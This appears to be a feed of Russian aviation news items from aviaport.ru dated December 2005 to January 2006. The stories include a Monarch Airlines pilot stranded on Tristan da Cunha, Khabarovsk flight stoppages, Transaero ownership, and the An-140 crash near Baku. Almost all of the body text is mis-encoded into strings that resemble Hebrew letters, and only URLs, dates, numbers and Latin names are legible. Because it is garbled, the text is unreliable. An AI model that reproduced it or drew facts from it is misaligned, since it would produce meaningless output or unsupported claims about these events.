םאץמהטכטס 210 קוכמגוך, כועוכ םא גסמעו מךמכמ 10 ךטכמלוענמג.ˆ ץמע המ ’וםונטפו מסעאגאכמס גסודמ 45 לטםףע ןמכועא, ‎ךטןאז ןנטרוכ ך גגמהף, קעמ ןנטסףעסעגטו ןםמדמ עףנטסעא ףדנמזאוע בוחמןאסםמסעט ןמכועא. ˆ נורטכ סמגונרטע םוחאןכאםטנמגאםםף‏ ןמסאהךף, קעמב גסאהטע בנטעאםצא םא ךנמרוקםמל מסענמגךו מנעמ-‘אםעמ, נאסןמכמזוםםמל םוהאכוךמ מע סוגונםמדמ ןמבונוז €פנטךט.‘ףה ןמ גסולף, מגי דמה ולף ןנטהועס גסענועטע םא ‎עמל מסענמגךו ס םאסוכוםטול ג קוענו עסקט קוכמגוך. ‡הוס םוע ךאחטםמ ט םמקםץ ךכףבמג. € והטםסעגוםםל נאחגכוקוםטול לוסעםץ זטעוכוי מסעא‏עס עמכךמ ןנמדףכךט ןמ ןוסקאםל ה‏םאל. נאגהא, טלוםםמ םא ‎עמל מסענמגו, סמדכאסםמ ןנוהאםטל, םוסךמכךמ סעמכועטי םאחאה בףהףשטי ןונגממעךנגאעוכ €לונטךט •נטסעמפמנ מכףלב ןמחםאךמלטכס סמ סגמוי בףהףשוי זוםמי. ’אך מנעמ-‘אםעמ גמרוכ ג טסעמנט‏.‚ןנמקול, ף בנטעאםסךמדמ "מבטםחמםא" ושו מסעאועס ראםס המבנאעס ך ןנאחהםטךף םא ’וםונטפו. נאגהא, עוןונ ולף ןנטהועס גבטנאע: כטבמ מעןנאגטעס םא מסענמג אהוינא םא ןאנמלו ט ףזו מעעףהא ןונוסוסע םא הנףדמי סאלמכוע המ לוסעא םאחםאקוםט, כטבמ גונםףעס המלמי ג €םדכט‏.€גטאךמלןאםט Monarch Airlines ןמךא ושו םו נורטכא, ןמהאגאע כט ג סףה םא םוחאהאקכטגמדמ בנטעאםצא ג סגחט ס םוחאןכאםטנמגאםםל טחלוםוםטול לאנרנףעא, ךמעמנמו, ןמ סכמגאל ןנוהסעאגטעוכ ךמלןאםטט, מבמרכמס וי ג םוסךמכךמ עסק פףםעמג סעונכטםדמג.סעאעטוסלמענ םא קוענוץקאסמגף‏ חאהונזךף, ןאססאזטנ ןמכםמסע‏ ןמההונזאכט נורוםטו ‎ךטןאזא גסאהטע סךגונםמסכמגא. אך סממבשטכא „זמ מבונעסמם, ןנוהסעאגטעוכ אגטאךמלןאםטט Monarch Airlines, םאנףרטעוכ‏ סןמךמיסעגט ןנוהכמזטכט ןמהןטסאע ןנמעמךמכ, דהו בכ חאפטךסטנמגאם פאךע ודמ םוןמהמבא‏שודמ ןמגוהוםט, מהםאךמ עמע מעךאחאכס ‎עמ סהוכאע. - - - - - ‚מחהףרםמו ןנמסענאםסעגמ •אבאנמגסךא ןףסעףוע - http://www.aviaport.ru/news/2006/01/02/99269.html - ונגמדמ םגאנ טח •אבאנמגסךא םו גכועטע םט מהטם סאלמכוע. ˆח •אבאנמגסךא ג ןונגי הום דמהא למזםמ גבנאעס עמכךמ ןמוחהמל, א עאךזו אגעמענאםסןמנעמל - Mon, 02 Jan 2006 13:03:00 +0300 - ונגמדמ םגאנ טח •אבאנמגסךא םו גכועטע םט מהטם סאלמכוע. ‚מע ךאך ןנמךמללוםעטנמגאכט סטעףאצט‏ ךמננוסןמםהוםעף ˆ€ REGNUM ג הטסןועקונסךמי •אבאנמגסךמדמ א‎נמןמנעא: "‘ודמהם םט מהטם סאלמכוע טץ •אבאנמגסךא םו גכועטע. ’אךא סטעףאצט ג •אבאנמגסךו גןונגו. ‘אלמכוע טח דמנמהא םו גכועא‏ע םו ןמ ןנטקטםו םוטסןנאגםמסעט, א ןמ ןנטקטםו מעסףעסעגט נויסמג. ע םאס ג מגי דמה םטךעמ םטךףהא םו כועטע. €גטאעמנ מעהץא‏ע".ˆח •אבאנמגסךא ג ןונגי הום דמהא למזםמ גבנאעס עמכךמ ןמוחהמל, א עאךזו אגעמענאםסןמנעמל. - - - - - "’נאםסא‎נמ" נאסךנכמ סענףךעףנף אךצטמםונםמדמ ךאןטעאכא - http://www.aviaport.ru/news/2005/12/29/99267.html - € "€גטאךמלןאםט "’נאםסא‎נמ" נאסךנכמ סענףךעףנף סגמודמ אךצטמםונםמדמ ךאןטעאכא. 32,1% אךצטי ךמםענמכטנףוע "‹מדמ‚€‡-‹", 44,1% גכאהו‏ע קכום סולט €. כוראךמגא - Thu, 29 Dec 2005 17:30:00 +0300 - € "€גטאךמלןאםט "’נאםסא‎נמ" נאסךנכמ סענףךעףנף סגמודמ אךצטמםונםמדמ ךאןטעאכא. אך סכוהףוע טח מפטצטאכםץ לאעונטאכמג ךמלןאםטט, 32,1% אךצטי ךמםענמכטנףוע "‹מדמ‚€‡-‹", 44,1% גכאהו‏ע קכום סולט ןנוהסוהאעוכ סמגועא הטנוךעמנמג "’נאםסא‎נמ" €כוךסאםהנא כוראךמגא. "‹מדמ‚€‡-‹", ףקנוזהוםםי ג 1996 דמהף ךמלןאםטוי "‹מדמ‚€‡", ךמםענמכטנףוע אךצטט "’נאםסא‎נמ" קונוח סגמט המקונםטו סענףךעףנ - ‡€ מנוי-2" ט ‡€ "אעלטנ+". מ האםםל טסעמקםטךא "ˆםעונפאךסא" ג אגטאצטמםםמי מענאסכט, סויקאס "‹מדמ‚€‡-‹" ףזו םו ןנטםאהכוזטע "‹מדמ‚€‡ף".‘מדכאסםמ המךףלוםעף, ןנוהסוהאעוכ‏ סמגועא הטנוךעמנמג "’נאםסא‎נמ" €כוךסאםהנף כוראךמגף ןנטםאהכוזטע 32,81% מבךםמגוםםץ אךצטי, א ודמ סףןנףדו, דוםונאכםמלף הטנוךעמנף € כדו כוראךמגמי - 8,08%. נמלו עמדמ, 3,25% אךצטי "’נאםסא‎נמ" ןנטםאהכוזאע לאעונט כוראךמגא, ןנוהסוהאעוכ‏ וזדמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ךמלטעועא ’אעםו €םמהטםמי.€ "€גטאךמלןאםט "’נאםסא‎נמ" ןמ ןאססאזטנממבמנמעף גץמהטע ג קטסכמ ןעט ךנףןםוירטץ נמססטיסךטץ אגטאךמלןאםטי. ‚נףקךא מע נואכטחאצטט חא 11 לוסצוג 2005 דמהא - 8,9 לכנה נףבכוי, ןאססאזטנממבמנמע - 4,8 לכנה ןאססאזטנמ-ךטכמלוענמג. - - - - - ‚ א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא סןנאגמקםא סטסעולא TouchTown (‘אלאנא) - http://www.aviaport.ru/news/2005/12/29/99266.html - ‚ וזהףםאנמהםמל א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא ˆםפמנלאצטמםםמ-סןנאגמקםא סטסעולא TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ‚ וזהףםאנמהםמל א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא ˆםפמנלאצטמםםמ-סןנאגמקםא סטסעולא TouchTown, - סממבשטכט ךמננוסןמםהוםעף ˆ€ REGNUM-‚מכדאˆםפמנל ג ןנוסס-סכףזבו א‎נמןמנעא. ƒכאגםל המסעמטםסעגמל סטסעול גכועס מןונאעטגםמו ןנוהמסעאגכוםטו םומבץמהטלמי ןאססאזטנף טםפמנלאצטט ס טסןמכחמגאםטול בוחדנאםטקםץ גמחלמזםמסעוי לףכעטלוהטא. ’וןונ אגטאןאססאזטנ ןנט ןמלמשט סוםסמנםמדמ עונלטםאכא למדףע ןמכףקטע ןנאךעטקוסךט כ‏בף‏ טםפמנלאצט‏ םו עמכךמ מב א‎נמןמנעו, םמ ט ןמ ‘אלאנו ג צוכמל. ’אך, האםםו סטסעול "TouchTown" ןמהוכום םא הגא בכמךא: "ףעוגמהטעוכ ןמ וזהףםאנמהםמלף א‎נמןמנעף "ףנףלמק" (חהוס ןאססאזטנ למדףע ןמחםאךמלטעס ס ןכאםמל ןמלושוםטי א‎נמןמנעא ט ןנטכודא‏שוי ך םולף עוננטעמנטט, א עאךזו ףחםאע מ ןנוהמסעאגכולץ ףסכףדאץ) ט "‚ס ‘אלאנא" (ג בכמךו סמהונזטעס טםפמנלאצט מ דמסעטםטצאץ, לוסעאץ מעהץא, נאחגכוךאעוכםץ ט עמנדמגץ צוםענאץ, ךמלןאםטץ, מךאחגא‏שטץ נאחכטקםו ןמענובטעוכסךטו ףסכףדט). - - - - - •ƒ€ ןנטחגאוע זףנםאכטסעמג בע לאךסטלאכםמ ךמננוךעםלט ג סממבשוםטץ מ נאבמעו ךמלטססטט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא €ם-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ‚ אךף סמסעמכאס ןנוסס-ךמםפונוםצט ןמ טעמדאל ןנוהגאנטעוכםמדמ נאססכוהמגאםט ןנטקטם ךאעאסענמפ סאלמכועא €ם-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 הוךאבנ 2005 ד. ג אךף סמסעמכאס ןנוסס-ךמםפונוםצט ןמ טעמדאל ןנוהגאנטעוכםמדמ נאססכוהמגאםט ןנטקטם ךאעאסענמפ סאלמכועא €ם-140-100. נוחףכעאעאץ נאבמע המכמזטכט מע טלוםט ךמלטססטט ןמ נאססכוהמגאםט‏ „זאץאםדטנ €סךונמג - דוםונאכםי הטנוךעמנ דמסףהאנסעגוםםמדמ ךמםצונםא AZAL, אגוכ אףלוםךמ - דוםונאכםי הטנוךעמנ •אנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ ןנוהןנטעט, מנטס ƒמנ‏םמג - ןנוהסעאגטעוכ וזדמסףהאנסעגוםםמדמ €גטאצטמםםמדמ מלטעועא, ‚טעאכטי טשוםךמ - הטנוךעמנ הוןאנעאלוםעא טםסןוךעטנמגאםט בוחמןאסםמסעט ןמכועמג ƒמסאגטאסכףזב “ךנאטם, ˆכדאל €לטנמג - ןנוהסוהאעוכ עוץםטקוסךמי ךמלטססטט ןמ נאססכוהמגאםט‏ ךאעאסענמפ. ‚מ גנול ןנוסס-ךמםפונוםצטט בכא מדכארוםא סכוהף‏שא טםפמנלאצט.23 הוךאבנ 2005 ד. ןמסכו גכועא טח א‎נמןמנעא אךף ןמעונןוכ ךאעאסענמפף ג נאימםו ןמסוכךא אנהאנאם םא ןמבונוזו אסןטיסךמדמ למנ סאלמכוע €ם-140-100 (םאצטמםאכםי ט נודטסענאצטמםםי חםאך 4-AZ48) אצטמםאכםמי אגטאךמלןאםטט "€חונבאיהזאם •אגא ‰מככאנ". ‘אלמכוע, גןמכםגרטי נויס AHY 217 ןמ לאנרנףעף אךף (€חונבאיהזאם) - €ךעאף (אחאץסעאם) טלוכ םא במנעף 18 ןאססאזטנמג ט 5 קכוםמג ‎ךטןאזא (ךמלאםהטנ ‹אגנטם €.€.). ‚ נוחףכעאעו ךאעאסענמפ ןמדטבכמ 23 קוכמגוךא, םאץמהטגרטץס ג סאלמכועו, ג עמל קטסכו 5 קכוםמג ‎ךטןאזא ט 18 ןאססאזטנמג, סנוהט ךמעמנץ בכט דנאזהאםו €חונבאיהזאםא (10), €גסענאכטט (1), ‚וכטךמבנטעאםטט (1), ƒנףחטט (1), אחאץסעאםא (4), ט ’ףנצטט (1). ‚‘ ןמכםמסע‏ נאחנףרוםמ.‚ נוחףכעאעו מנדאםטחמגאםםמדמ ןמטסךא מבכמלךט ‚‘ בכט מבםאנףזום םא בונודמגמי קונעו ג נאימםו םאסוכוםםמדמ ןףםךעא אנהאנאם. נמגוהוםטו אגאנטיםמ-סןאסאעוכםץ נאבמע מסכמזםכמס עולםל גנולוםול סףעמך ט םובכאדמןנטעםלט ןמדמהםלט ףסכמגטלט (םטחךא מבכאקםמסע, המזה, גועונ ט גמכםוםטו למנ). ןמטסךמגל נאבמעאל םולוהכוםםמ בכט ןנטגכוקום סטכ אגאנטיםמ-סןאסאעוכםץ סכףזב, ‚„, ƒמסףהאנסעגוםםמי ןמדנאםטקםמי סכףזב, ƒנאזהאםסךמי מבמנמם וסןףבכטךט €חונבאיהזאם. ‚ ץמהו נאבמע בכט ‎גאךףטנמגאם מסעאםךט גסוץ ןמדטברטץ. נמהמכזא‏עס נאבמע ןמ ןמטסךף ט טחגכוקוםט‏ טח למנ פנאדלוםעמג ‚‘.מלטססט ןמ נאססכוהמגאםט‏ אגטאךאעאסענמפ סאלמכועא €ם-140-100 4-AZ48, טחףקטג האםםו מבתוךעטגםמדמ ךמםענמכ, סםעו ס חאשטשוםםמדמ במנעמגמדמ םאךמןטעוכ ףסענמיסעגא נודטסענאצטט “-92€, א עאךזו, סמןמסעאגטג טץ ס טםפמנלאצטוי הטסןועקונסךטץ סכףזב, לאעונטאכאלט, סמבנאםםלט םא לוסעו ךאעאסענמפ, גמססעאםמגטכא ןנוהגאנטעוכםמ סכוהף‏שף‏ ךאנעטםף סמבעטי.‚חכוע סמסעמכס ג סממעגועסעגטט ס נאסןטסאםטול. א ‎עאןו םאבמנא גסמע ןנמטחמרכמ ףךכמםוםטו גמחהףרםמדמ סףהםא (‚‘) מע ףסעאםמגכוםםמי ענאוךעמנטט ןמכועא. ‡אעול ‎ךטןאז סממבשטכ סכףזבו “‚„ מ עוץםטקוסךטץ ןנמבכולאץ םא במנעף ‚‘. —ונוח םוסךמכךמ סוךףםה סגח ס ‎ךטןאזול ןנמןאכא, א מעלועךא ‚‘ טסקוחכא ס ‎ךנאםמג נאהאנא. מ האםםל מבתוךעטגםמדמ ךמםענמכ ןמסכו םאבמנא גסמע המ 2100 ל סאלמכוע םאקאכ סםטזוםטו ןמ םטסץמהשוי סןטנאכט ס ףלוםרא‏שטלטס נאהטףסאלט מע 500 ל המ 100 ל, סמגונרטג ןנט ‎עמל 4,5 גטעךא.אסרטפנמגךא במנעמגמדמ ףסענמיסעגא נודטסענאצטט ןמךאחאכא, קעמ הגטדאעוכט ‚‘, סטסעול ףןנאגכוםט, ‎םונדמסםאבזוםט ט הנףדטו בכט טסןנאגם ט נאבמעמסןמסמבם.א ‎עאןו םאבמנא גסמע במנעמגל ףסענמיסעגמל נודטסענאצטט בכמ חאפטךסטנמגאםמ מהםמגנולוםםמו מעסףעסעגטו טםהטךאצטט ‎ךטןאזף גסוץ ענוץ אגטאדמנטחמםעמג (אגטאדמנטחמםע - ןנטבמנ, ןמךאחגא‏שטי ‎ךטןאזף ןמכמזוםטו ‚‘ ג ןנמסענאםסעגו). םאסעמשולף גנולוםט ןנטקטםא מעסףעסעגט טםהטךאצטט אגטאדמנטחמםעמג םו ףסעאםמגכוםא. ƒוםונאכםי הטנוךעמנ ךמםצונםא AZAL „זאץאםדטנ €סךונמג חאגטכ םא ןנוסס-ךמםפנוםצטט: "עא סטעףאצט םו סעאםהאנעםא ט ףםטךאכםא, ןמ‎עמלף עמ, קעמ ןנמטחמרכמ, גכועס סכוהסעגטול םוךטץ סמבעטי, ךמעמנו בףהףע טחףקאעס". אבמעא ךמלטססטט ןנמהמכזאועס.מ נוךמלוםהאצטט ךמלטססטט נאגטעוכסעגמ €חונבאיהזאםא ןנטםכמ נורוםטו גנולוםםמ ןנטמסעאםמגטע, המ חאגונרוםט נאססכוהמגאםט ךאעאסענמפ, ‎ךסןכףאעאצט‏ €ם-140-100 ג אגטאךמלןאםטט "€חונבאיהזאם •אגא ‰מככאנ". מםענאךע לוזהף ךמםצונםמל AZAL ט •אנךמגסךטל דמסףהאנסעגוםםל אגטאצטמםםל ןנמטחגמהסעגוםםל ןנוהןנטעטול מסעאועס ג סטכו, מהםאךמ סנמךט גןמכםוםט ודמ בףהףע סךמננוךעטנמגאם ס ףקועמל מךמםקאעוכםץ גגמהמג ךמלטססטט, ךמעמנו מדכאסע ןמ נוחףכעאעאל נאססכוהמגאםט ךאעאסענמפ סאלמכועא €ם-140-100, ןנמטחמרוהרוי 23 הוךאבנ 2005 דמהא.א ןנוסס-ךמםפונוםצטט, סמסעמגרויס 28 הוךאבנ ג אךף, בכמ מדכארוםמ חאגכוםטו ךמלטססטט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ, סמדכאסמגאםםמו סמ גסולט וו ףקאסעםטךאלט, ג עמל קטסכו ט ס ןנוהסעאגטעוכלט •ƒ€. מ‎עמלף ןףבכטךאצטט נהא ‎כוךענמםםץ ‘ˆ, סמהונזאשטו טםפמנלאצט‏ מ עמל, "קעמ ןנמטחגמהטעוכט סאלמכועמג םו סמדכאסם ס גגמהאלט ךמלטססטט", םו סממעגועסעגף‏ע הויסעגטעוכםמסעט.•ƒ€ מבנאשאוע גםטלאםטו םא םוהמןףסעטלמסע ןנמטחגמכםץ טםעונןנועאצטי ןמחטצטט ןנוהןנטעט ט ןמהקונךטגאוע, קעמ םט ג מהםמל טח טםעונג‏, האםםמל ןנוהסעאגטעוכל ‘ˆ, םט מהטם טח נףךמגמהטעוכוי ןנוהןנטעט םו גסךאחגאכ םט גונסטי ךאעאסענמפ סאלמכועא €ם-140-100, םט לםוםטי, ןנמעטגמנוקאשטץ גגמהאל ךמלטססטט ןמ וו נאססכוהמגאםט‏. - - - - - €‎נמןמנע "•ונסמם" טשוע מצוםשטךא - http://www.aviaport.ru/news/2005/12/29/99264.html - ‹טךגטהטנףולמו ךמללףםאכםמו ןנוהןנטעטו "€‎נמןמנע "•ונסמם" מבתגטכמ ךמםךףנס ןמ מעבמנף מצוםשטךא סגמודמ צוכמסעםמ-טלףשוסעגוםםמדמ ךמלןכוךסא - Thu, 29 Dec 2005 16:57:00 +0300 - ‹טךגטהטנףולמו ךמללףםאכםמו ןנוהןנטעטו "€‎נמןמנע "•ונסמם" מבתגטכמ ךמםךףנס ןמ מעבמנף מצוםשטךא סגמודמ צוכמסעםמ-טלףשוסעגוםםמדמ ךמלןכוךסא.ב ‎עמל דמגמנטעס ג סממבשוםטט א‎נמןמנעא, סממבשאוע “ךנא»םסך´ מגטםט.צוםךא ןנמגמהטעס הכ ףסעאםמגכוםט נאחלונא גחםמסא ג ףסעאגםי פמםה, ךמעמני גםמסטעס •ונסמםסךטל מבכאסעםל סמגועמל ג סמחהאגאולמו םא באחו א‎נמןמנעא מבשוסעגמ ס מדנאםטקוםםמי מעגועסעגוםםמסע‏ "€‎נמןמנע "•ונסמם".“קאסעםטךאל ךמםךףנסא םומבץמהטלמ ןמהאע המךףלוםע ג ךמםךףנסםף‏ ךמלטססט‏ המ 12 םגאנ 2006 דמהא (גךכ‏קטעוכםמ).€‎נמןמנע םאץמהטעס ןמ אהנוסף: 73038, •ונסמם-38.נדאםטחאצטמםםמ-ןנאגמגא פמנלא א‎נמןמנעא "•ונסמם" - ךמללףםאכםא סמבסעגוםםמסע (סמגלוסעםא סמבסעגוםםמסע עוננטעמנטאכםץ מבשטם מבכאסעט). - - - - - "‹“‰‹-€‎נמ" ןנטמבנוכמ ף אגטאךמלןאםט "‘טבטנ" עמןכטגמחאןנאגמקםי ךמלןכוךס ג לוזהףםאנמהםמל א‎נמןמנעף —וכבטםסךא - http://www.aviaport.ru/news/2005/12/29/99263.html - "‹“‰‹-€‎נמ" (100-ןנמצוםעםא המקונם ךמלןאםט € "‹“‰‹") ןנטמבנוכמ ף € "€גטאךמלןאםט "‘טבטנ" ’‡ "אכאםהטםמ" ג לוזהףםאנמהםמל א‎נמןמנעף —וכבטםסךא - Thu, 29 Dec 2005 16:55:00 +0300 - "‹“‰‹-€‎נמ" (100-ןנמצוםעםא המקונם ךמלןאםט € "‹“‰‹") ןנטמבנוכמ ף € "€גטאךמלןאםט "‘טבטנ" עמןכטגמחאןנאגמקםי ךמלןכוךס (’‡) "אכאםהטםמ" ג לוזהףםאנמהםמל א‎נמןמנעף —וכבטםסךא, סממבשאוע ןנוסס-סכףזבא ‹“‰‹א. ƒמהמגמי מבתול חאןנאגךט סמסעאגכוע ןנטלונםמ 40 עס. עמםם. ‚ בכטזאירוו גנול "‹“‰‹-€‎נמ" ןכאםטנףוע ןנמגוסעט נוךמםסענףךצט‏ ט למהונםטחאצט‏ סךכאהא ƒ‘ ’‡.‚ םאסעמשוו גנול "‹“‰‹-€‎נמ" ןנמטחגמהטע חאןנאגךף גמחהףרםץ סףהמג קונוח סמבסעגוםםף‏ סוע ’‡ ג א‎נמןמנעאץ טזםודמ מגדמנמהא, ונלט, ‚מכדמדנאהא, ’‏לוםט ט —וכבטםסךא. ‚ 2005 דמהף "‹“‰‹-€‎נמ" מסףשוסעגטכמ חאןנאגךף ג מבתולו מךמכמ 100 עס. עמםם אגטאךונמסטםא.אחגטעטו אגטאעמןכטגמחאןנאגמקםמדמ בטחםוסא ןנוהףסלמענוםמ ג נמדנאללו סענאעודטקוסךמדמ נאחגטעט ƒנףןן "‹“‰‹" ט ןנוהןמכאדאוע נאסרטנוםטו נםךא סבעא אגטאעמןכטגא ט סמחהאםטו נאחגטעמי סועט סמבסעגוםםץ עמןכטגמחאןנאגמקםץ ךמלןכוךסמג ג א‎נמןמנעאץ מססטט ט חא נףבוזמל. - - - - - מגטכאס i-mode גונסט סאיעא א‎נמןמנעא "„מלמהוהמגמ" - http://www.aviaport.ru/news/2005/12/29/99262.html - ‚ ˆםעונםועו ןמגטכאס i-mode גונסט סאיעא א‎נמןמנעא "„מלמהוהמגמ". „כ ןמכחמגאעוכוי למבטכםץ עוכופמםמג המסעףןםמ מםכאים-עאבכמ ט נאסןטסאםטו - Thu, 29 Dec 2005 16:52:00 +0300 - ‚ ˆםעונםועו ןמגטכאס i-mode גונסט סאיעא א‎נמןמנעא "„מלמהוהמגמ", - הכ ןמכחמגאעוכוי למבטכםץ עוכופמםמג המסעףןםמ סאלמו מסםמגםמו - מםכאים-עאבכמ ט נאסןטסאםטו.‚ בכטזאירוו גנול בףהוע מעךנע ושו מהטם ךאםאכ המסעאגךט טםפמנלאצטט ס ˆםעונםוע-סאיעא - סאיע הכ . אןמלםטל, קעמ םא האםםי למלוםע חמםאלט ןמךנעט Wi-Fi גכ‏עס גוס געמנמי ‎עאז, בטחםוס-חאכ ט חאכ מפטצטאכםץ הוכודאצטי ט VIP.א הםץ בףהוע נוראעס גמןנמס מב ףגוכטקוםטט חמם ןמךנעט, ג עמל קטסכו מבוסןוקטע המסעףן ןמ Wi-Fi ג חאכאץ ןנטכועא ט מזטהאםט לוזהףםאנמהםץ ט גםףענוםםטץ נויסמג, ג םמגץ ןמלושוםטץ, ךמעמנו ןמגעס ןמסכו גםמסא פאסאהא א‎נמגמךחאכא. - - - - - נאזסךטי א‎נמןמנע קאסעטקםמ חאךנע טח-חא סםודמןאהא - http://www.aviaport.ru/news/2005/12/29/99261.html - וזהףםאנמהםי א‎נמןמנע נאדט ףחםו קאסעטקםמ חאךנע ג קועגונד ןמסכו םמקםמדמ סםודמןאהא - Thu, 29 Dec 2005 16:49:00 +0300 - וזהףםאנמהםי א‎נמןמנע נאדט ףחםו קאסעטקםמ חאךנע ג קועגונד ןמסכו םמקםמדמ סםודמןאהא. נוסס-סוךנועאנ אהלטםטסענאצטט א‎נמןמנעא סממבשטכא, קעמ סאלמכוע םו למדףע גחכועאע ט א‎נמןמנע ג סמסעמםטט ןנטםטלאע עמכךמ 15 סאלמכועמג ג קאס. םא םו סממבשטכא גנולוםט ןמכםמדמ גמססעאםמגכוםט נאבמע א‎נמןמנעא. - - - - - †„ מעךנמוע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע מסךג המ א‎נמןמנעא "˜ונולועוגמ" ך 2007 דמהף - http://www.aviaport.ru/news/2005/12/29/99260.html - € "מססטיסךטו זוכוחםו המנמדט" ןכאםטנףוע מעךנע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע מסךג (‘אגוכמגסךטי גמךחאכ) המ א‎נמןמנעא "˜ונולועוגמ" ך 1 םגאנ 2007 ד. - Thu, 29 Dec 2005 16:45:00 +0300 - € "מססטיסךטו זוכוחםו המנמדט" (†„) ןכאםטנףוע מעךנע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע מסךג (‘אגוכמגסךטי גמךחאכ) המ א‎נמןמנעא "˜ונולועוגמ" ך 1 םגאנ 2007 דמהא, סממבשטכ דכאגא פטכטאכא †„ "מסךמגסךא זוכוחםא המנמדא" (†„) ‚כאהטלטנ ‘עאנמסעוםךמ זףנםאכטסעאל ג לטםףגרף‏ סנוהף ג מסךגו." נאססקטעגאול, קעמ ך םאקאכף 2007 דמהא ףסןוול ןמסענמטע זוכוחםמהמנמזםף‏ גועךף מע ‹מבםט המ א‎נמןמנעא", - סךאחאכ ‚.‘עאנמסעוםךמ. ם מעלועטכ, קעמ םאקאכמ סענמטעוכסעגא חאןכאםטנמגאםמ םא אןנוכ 2006 דמהא.מ ודמ סכמגאל, נוק טהוע מ סענמטעוכסעגו 8,2 ךל ןףעוי, ךמעמנמו בףהוע פטםאםסטנמגאעס חא סקוע טםגוסעןנמדנאלל †„.ƒכאגא †„ מעלועטכ עאךזו, קעמ ןמךא םוסםמ, דהו בףהוע נאסןמכאדאעס זוכוחםמהמנמזםא סעאםצט ג "˜ונולועוגמ". "…סכט בףהוע דמעמג עונלטםאכ ("˜ונולועוגמ-3" - ˆ”), עמ ןמוחה ןמהמיהוע עףהא, וסכט םוע, עמ ל דמעמג ןמסענמטע מבקםף‏ סעאםצט‏", - סךאחאכ ‚.‘עאנמסעוםךמ. - - - - - ךסןכףאעאצט‏ סאלמכועמג €ם-140 למדףע גנולוםםמ ןנטמסעאםמגטע - http://www.aviaport.ru/news/2005/12/29/99259.html - ךסןכףאעאצט‏ סאלמכועמג €ם-140 למדףע גנולוםםמ ןנטמסעאםמגטע המ גסםוםט גסוץ מבסעמעוכסעג ךאעאסענמפ לארטם ג €חונבאיהזאםו - Thu, 29 Dec 2005 16:43:00 +0300 - ךסןכףאעאצט‏ סאלמכועמג €ם-140 למדףע גנולוםםמ ןנטמסעאםמגטע המ גסםוםט גסוץ מבסעמעוכסעג ךאעאסענמפ לארטם ג €חונבאיהזאםו.’אךף‏ עמקךף חנוםט גסךאחגא‏ע ‎ךסןונע, ךמללוםעטנף גונסטט ךאעאסענמפ סאלמכועא ןמה אךף.‘מדכאסםמ מהםמי טח םטץ, ןנטקטםמי ןאהוםט €ם-140 סעאכט עוץםטקוסךטו םוןמכאהךט, ט קעמב ןמכםמסע‏ טסךכ‏קטע גונמעםמסע ןמגעמנוםט ענאדוהטט, ןמכוע הוסעךא םאץמהשטץס סויקאס ג ‎ךסןכףאעאצטט ףךנאטםסךטץ אגטאךמלןאםטי לארטם ‎עמדמ עטןא למדףע ןנטמסעאםמגטע.נוהסעאגטעוכט ƒמסאגטאסכףזב “ךנאטם האםםף‏ טםפמנלאצט‏ םו ןמהעגונזהא‏ע, חאגכ, קעמ זהףע מךמםקאעוכםץ גגמהמג ךמלטססטט ג €חונבאיהזאםו.הםאךמ ‎ךסןונע דמגמנע - חאןנוע גסו זו למזוע בע גגוהום, ססכאס םא מןע עמי זו מססטט, דהו טח-חא ןמכמלךט ג ראססט ןנוחטהוםעסךמדמ סאלמכועא בכט ןמסעאגכום םא ןנטךמכ גסו לארטם האםםמי למהוכט. - - - - - €‎נמןמנע מסךג נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו" - http://www.aviaport.ru/news/2005/12/29/99258.html - ˆח-חא סטכםמדמ סםודמןאהא ג מסךגו א‎נמןמנע "‚םףךמגמ", "„מלמהוהמגמ" ט "˜ונולועוגמ" נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו", םמ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג םוע - Thu, 29 Dec 2005 16:36:00 +0300 - ˆח-חא סטכםמדמ סםודמןאהא ג מסךגו סעמכטקםו א‎נמןמנע "‚םףךמגמ", "„מלמהוהמגמ" ט "˜ונולועוגמ" נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו", םמ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג םוע. ב ‎עמל סממבשטכ ג קועגונד ˆ€ מגמסעט ןנוהסעאגטעוכ –וםענאכםמי הטסןועקונסךמי סכףזב (–„‘) מסךג."‚סו סעמכטקםו א‎נמןמנע נאבמעא‏ע סויקאס "ןמ פאךעטקוסךמי ןמדמהו", עמ וסע, ןטכמע סאלמסעמעוכםמ ןנטםטלא‏ע נורוםטו מ ןמסאהךו. הםאךמ םטךאךטץ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג ג א‎נמןמנעאץ םוע", - סךאחאכ ןנוהסעאגטעוכ –„‘.ם עאךזו מעלועטכ, קעמ "םט מהטם א‎נמןמנע םו מבתגטכ מ חאךנעטט טח-חא ןמדמה"."‚מ גסוץ א‎נמןמנעאץ סויקאס גטהטלמסע סמסעאגכוע במכוו עסקט לוענמג. ‚סו גחכוע ט ןמסאהךט מסףשוסעגכ‏עס ןמ נאסןטסאםט‏, בוח סבמוג. ”אךעמג חאךנעט א‎נמןמנעמג םו בכמ", - סממבשטכ סמבוסוהםטך אדוםעסעגא.מ ודמ סכמגאל, גמ גסוץ סעמכטקםץ א‎נמןמנעאץ ג םאסעמשוו גנול נאבמעאוע סןוצעוץםטךא הכ נאסקטסעךט סםודא. "‚ סכףקאו ףסטכוםט סםודמןאהא, ג א‎נמןמנעאץ בףהוע גגוהוםא המןמכםטעוכםא סןוצעוץםטךא", - המבאגטכ ןנוהסעאגטעוכ –„‘. - - - - - €גטאןנמל םא טחכועו - http://www.aviaport.ru/news/2005/12/29/99257.html - ‡אעםףגרווס מזטהאםטו נורוםטי גכאסעוי מ סףהבו נמססטיסךמדמ אגטאןנמלא ט סךאםהאכ גמךנףד חאןנועא םא ןמכוע ˆכ-96-300 - דכאגםו 